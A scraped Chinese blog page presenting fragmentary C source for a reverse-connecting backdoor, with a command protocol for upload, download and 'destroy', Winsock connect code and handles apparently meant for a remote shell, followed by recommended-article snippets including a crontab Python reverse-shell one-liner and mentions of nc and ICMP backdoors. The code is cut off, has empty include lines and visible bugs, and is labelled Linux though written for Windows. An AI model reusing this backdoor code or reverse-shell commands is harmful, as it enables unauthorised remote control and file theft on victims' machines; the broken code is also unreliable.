linux 反弹后门 c语言,C语言做的后门【反连】

最新推荐文章于 2023-04-26 08:00:00 发布
最新推荐文章于 2023-04-26 08:00:00 发布
阅读量153 收藏
点赞数
文章标签: linux 反弹后门 c语言

该楼层疑似违规已被系统折叠 隐藏此楼查看此楼

/*

Protocol of connection

Connect : CONN

Connected Success : SUCC

Reboot : REBT   暂时不可用

Upload : UPLD

Download : DNLD

Destroy : DTOY   暂时不可用

Help : HELP    暂时不可用

OK : START TO TRANSFER FILE

DoneTrans : Finish Transferring

*/

#include

#include

#include

#define CONNECT 0

#define LISTEN 1

#define ACCEPT 2

#define 加载WSA() LoadWSA()

#define 初始化套接字(地址的指针,设置,链接阵列,监听中的套接字) LoadSOCKET(地址的指针,设置,链接阵列,监听中的套接字)

#define 发送(套接字,缓冲区,数据长度) WSASend(套接字,缓冲区,数据长度)

#define 接受(套接字,数据长度) WSARecv(套接字,数据长度)

#define CONNECT 0

#define LISTEN 1

#define ACCEPT 2

#define INVALID_SETTING -50 //参数错误

#define MAXIMUM 65535

#define MINIMUM 1

#define READ 0

#define WRITE 1

#pragma comment(lib,"ws2_32.lib")

SOCKET sock;

HANDLE hReadWrite1[2];

HANDLE hReadWrite2[2];

STARTUPINFO SI;

SECURITY_ATTRIBUTES sa;

struct sockaddr_in saddr;

struct hostent *host;

long Bytes;

FILE fp;

int LoadWSA()//加载Winsock库

{

WSADATA wd;

if(WSAStartup(0x0202,&wd)!=0)//加载失败时返回WSA错误码

{

return(WSAGetLastError());

}

return 0;//否则返回0

}

SOCKET LoadSOCKET(struct sockaddr_in *saddr,int SET,int array,SOCKET ListenSocket)

{

SOCKET sock;

int size=sizeof(struct sockaddr);

if(SET<2)//如果传入设置为ACCEPT

{

sock=socket(AF_INET,SOCK_STREAM,0);

}

if(saddr=NULL)//传入空白的saddr

{

return -50;

}

switch(SET)

{

case 0://如果为CONNECT

{

if(connect(sock,(struct sockaddr*)&saddr,sizeof(struct sockaddr))<0)

{

return NULL;

}

}

case 1://如果为LISTEN

神灵万古之蒂
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
简单的Linux查找后门思路和shell脚本分享
09-15
主要介绍了简单的Linux查找后门思路和shell脚本分享,本文的方法相对简单,提了一个思路和简单的Shell实现脚本,需要的朋友可以参考下
Linux后门shell
11-03
linux后门脚本,后门脚本源C语言代码,有兴趣下载回去自己研究。
Linux编程之给你的程序开后门
weixin_33938733的博客
01-14 109
这里说的“后门”并不是教你坏事,而是让你好事,搭建自己的调试工具更好地进行调试开发。我们都知道,当程序发生异常错误时,我们需要定位到错误,有时我们还想,我们在不修改程序的前提下,就能通过log来定位错误呢?有人会说,我在我的程序里加多点打印就好了,程序每一步我就加一行打印,到时一查log就知道程序在哪一步死掉的了。这个方法在小程序里也许会行得通,但是,在一个大型系统,每秒的log达到几百条,...
Linux渗透之反弹Shell命令解析
deeplearnings的博客
08-18 9870
前言 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普,那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。 B
linux 反弹后门 c语言,什么是反弹shell 在liunx下如何检测后门
weixin_28752743的博客
05-12 245
反弹是shell攻击者拿来控制目标网站服务器的1种方式。目标网站服务器主动发出网络连接请求,将网站服务器命令执行的规范输入、规范输出和规范错误重定向给攻击者。通过监听来自目标网站服务器的请求,攻击者向目标服务器发送指令并获得执行结果。它通常用于目标网站服务器位于内部网、受防火墙策略限制等入侵场景。云上的现状通过分析云上近三年的Linux网站服务器入侵恶性事件,反弹shell建立的语言和软件在攻击环...
Linux下的ICMP反弹后门:PRISM
最新发布
J_linnb的博客
04-26 462
安装完解压后可以看到文件内容很简单,根据网站上的介绍可以得知它可以在Linux,Solaris,AIX,BSD/Mac,Android等多个系统运行。脚本发送包到后门主机,本地监听相关端口等待后门主机反弹连接(先开一个终端进行第一步监听,再开一个终端使用sendPacket.py脚本)使用此操作模式,后门在后台静默等待特定的 ICMP 数据包,该数据包包含要重新连接的主机/端口和防止第三方访问的私钥。比赛时遇到的这个基于ping的ICMP后门,看了很多大佬写的文章,自己决定试一下。交叉编译prism后门
某些 x86 CPU 中的 硬件后门_C语言_代码_下载
07-04
x86 CPU 中的硬件后门 概述 project:rosenbridge 在一些台式机、笔记本电脑和嵌入式 x86 处理器中发现了一个硬件后门后门允许 ring 3(用户空间)代码绕过处理器保护以自由读写 ring 0(内核)数据。虽然后门...
who-openport:用纯C语言编写的后门解体程序。此项目已经存在,并且正在运行中!
05-14
谁开放端口(wopnt) @Copyrights mrx6s0-2017-github.com/mrx6s0经典[反向]后门,用纯C语言编写。开发中。加入这个项目,联络我!... 用C语言开发后门写入职能: (#)禁用防病毒(#)禁用防火墙(#
2 美元的硬件SSH 密钥存储_设计_文档_相关文件_下载_C语言
07-06
它可能不像智能卡那样受到所有物理攻击的保护,但是在某些情况下,它受到更多保护,因为它是透明的,不会像智能卡一样隐藏后门(例如,CVE-2017-15361),并且使用非常简单的协议来降低发生概率软件利用协议的“角落...
隐藏型后门程序设计
04-24
在"隐藏型后门程序设计.caa"这个文件中,很可能是包含了一段用C语言编写的后门程序示例。通过分析这段代码,我们可以学习如何在程序中隐蔽地插入后门,了解后门的触发机制和通信方式。这可能涉及到网络协议的定制、...
操作系统权限维持(十六)之Linux系统- TCP Wrappers反弹shell后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-28 412
以ssh为例,每当有ssh的连接请求时,tcpd即会截获请求,先读取系统管理员所设置的访问控制文件,符合要求,则会把这次连接原封不动的转给真正的ssh进程,由ssh完成后续工作;TCPWrappers是一个工作在第四层(传输层)的的安全工具,对有状态连接的特定服务进行安全检测并实现访问控制,凡是包含libwrap.so库文件的的程序就可以受TCPWrappers的安全控制。当使用服务端ssh连接的时候,它开始匹配规则,然后利用spawn执行的nc反弹了一个root权限的shell。
linux后门简单编程,Linux编程之给你的程序开后门
weixin_33011357的博客
05-17 190
1 #include 2 #include 3 #include 4 #include 5 #include 6 #include 7 #include 8 #include "msg_def.h"9 #include "global.h"1011 externQueue_t MsgQueue;12 extern dashboard_t global;131415 #define MAX_NUM...
黑客技术:针对linux系统进行渗透时,使用python生成反向tcp后门
python学习者的博客
11-15 991
针对linux系统进行渗透时,我们会在相对安全的环境下进行攻击。一般我们会在目标机器上安装一些虚拟化的软件,并且针对系统安装相应的环境。为了渗透成功,我们需要在靶机上种植后门,但是现在大部分杀毒软件都会对MSF产生的后门进行查杀,所以在实战中我们需要避免使用msf这种工具产生后门。这就需要我们自己编写后门程序了,这篇文章就是讲如何编写msf中的其中一个payload:reverse_tcp模块。 ...
操作系统权限维持(六)之Linux系统-定时任务后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-27 671
使用crontab命令进行反弹shell。crontab命令用于设置周期性被执行的指令。新建shell脚本,利用脚本进行反弹。我们可以使用crontab -e或者vim /etc/crontab添加计划任务。kali机器收到反弹shell。设置定时任务为每分钟执行一次。kali机器开启监听。
linux运维电脑,Linux运维知识之linux 后门程序
weixin_42298064的博客
05-12 154
本文主要向你们介绍了Linux运维知识之linux 后门程序linux 后门linux 后门,通过详细的内容向你们展现,希望对各位学习Linux运维知识有所帮助。/*/*Gummo后门服务器/*编译:ccserver.c-oserver/*使用:./server&/*echo/tmp/server&>>/etc/rc.d/rc.local*/#include#inclu...
一条命令实现命令行反弹后门
weixin_34149796的博客
02-04 291
TCP反弹后门//python版本,kali下面测试成功,tcp8080: (crontab-l;printf"*/5****/usr/bin/python-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.1...
linux留一个后门后备
vbaspdelphi的专栏
11-17 5469
在这里要为大家提供的是 prism,这个在github里面有,编译安装后,执行很简单,只需要执行一条命令,发送一条icmp,这样一条反弹shell就成了。有几点需要注意: 1. 密码是在文件里面修改,然后编译直接出来的 2. 直接./prims就可以执行了实战使用 修改密码,文件prism.c里面搜索p4,我这里修改成了20个Q 编译 gcc -DDETACH -DNORENAME -Wall
linux 内核 后门,一个简单的Linux内核后门原型(ZT)
weixin_35336727的博客
04-30 159
作者:wzt 这是一个在内核模块中实现的反连后门,大家看看这于应用层上的实现有什么不同吧,呵呵/** Kernel mode connect backdoor,haha~** just a demo module to teach you how to write a backdoor in kernel mode,* i belive you can add more code to make ...
linux后门分析,浅谈Linux后门技术及实践入侵
weixin_34511324的博客
05-13 265
2、编译程序encode,依次执行得到关键字符串与magic串异或后的结果,例如原始login的文件名/sbin/xlogin,经过异或后为:\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb3、在后门源代码中这样定义:Charlogin[]="\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb";然后插入异或函数char *de...
Windows系统后门程序实现:基于反弹Socket通信
"这篇文档是关于使用C语言实现基于反弹Socket通信的Windows系统后门的毕业设计项目。项目旨在创建一个能够控制计算机系统的后门程序,适用于渗透测试和信息收集,但强调不得用于非法用途。该后门程序由三个子程序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值